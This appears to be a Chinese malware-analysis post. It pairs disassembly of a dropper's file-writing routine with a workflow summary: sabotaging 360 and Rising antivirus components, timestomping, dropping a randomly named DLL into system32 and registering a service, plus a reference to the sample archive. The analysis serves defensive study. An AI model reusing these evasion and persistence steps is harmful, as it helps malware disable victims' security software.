00401152 |. 8D4424 1C lea eax, dword ptr [esp+1C]
00401156 |. 52 push edx ; /pLastWrite
00401157 |. 6A 00 push 0 ; |pLastAccess = NULL
00401159 |. 50 push eax ; |pCreationTime
0040115A |. 56 push esi ; |hFile
0040115B |. FF15 68204000 call dword ptr [402068] ; \SetFileTime - timestomp to 2004-08-17 20:00
00401161 |. 8D4C24 2C lea ecx, dword ptr [esp+2C]
00401165 |. 6A 00 push 0 ; /pOverlapped = NULL
00401167 |. 51 push ecx ; |pBytesWritten
00401168 |. 53 push ebx ; |/hResource
00401169 |. 6A 00 push 0 ; ||hModule = NULL
0040116B |. FF15 B0204000 call dword ptr [4020B0] ; |\SizeofResource
00401171 |. 50 push eax ; |nBytesToWrite
00401172 |. 57 push edi ; |Buffer = resource bytes
00401173 |. 56 push esi ; |hFile
00401174 |. FF15 B4204000 call dword ptr [4020B4] ; \WriteFile (result not checked)
0040117A |. 56 push esi ; /hObject
0040117B |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
00401181 |. 57 push edi ; /hResource
00401182 |. FF15 BC204000 call dword ptr [4020BC] ; \FreeResource
00401188 |. 8BB424 480200>mov esi, dword ptr [esp+248] ; esi = destPath
0040118F |. 8D5424 30 lea edx, dword ptr [esp+30] ; edx = tmp path
00401193 |. 56 push esi ; /NewName = destPath
00401194 |. 52 push edx ; |ExistingName = tmp
00401195 |. FF15 C0204000 call dword ptr [4020C0] ; \MoveFileA (result not checked)
0040119B |. 6A 00 push 0 ; /FileAttributes = 0
0040119D |. 56 push esi ; |FileName = destPath
0040119E |. FF15 C4204000 call dword ptr [4020C4] ; \SetFileAttributesA
004011A4 |. 8D4424 30 lea eax, dword ptr [esp+30]
004011A8 |. 50 push eax ; /FileName = tmp (only still present if the move failed)
004011A9 |. FF15 C8204000 call dword ptr [4020C8] ; \DeleteFileA
004011AF |. 5F pop edi
004011B0 |. 5E pop esi
004011B1 |. B8 01000000 mov eax, 1 ; return 1 unconditionally from here
004011B6 |. 5B pop ebx
004011B7 |. 81C4 2C020000 add esp, 22C
004011BD \. C3 retn


另外一个函数就是 0040173B 处的 call eax, 它运行 DLL 导出的 Install 函数, 主要是注册一个系统服务.

程序启动的工作流程为:

1. 检测360卫士,将其antispy.dll重新命名为WS2_32.dll
2. 检测RSTrai.exe进程,并强行结束
3. 生成一个半随机的DLL文件名 R_m_t_C.dll (下划线处为随机小写字母)
4. 从资源中获取DLL资源,释放到当前用户的temp目录中,并移动到system32下,文件名为3中生成的文件名
5. 读取dll文件,并运行Install函数,注册系统服务
6. misswe结束

文件: misswe.rar
大小: 47KB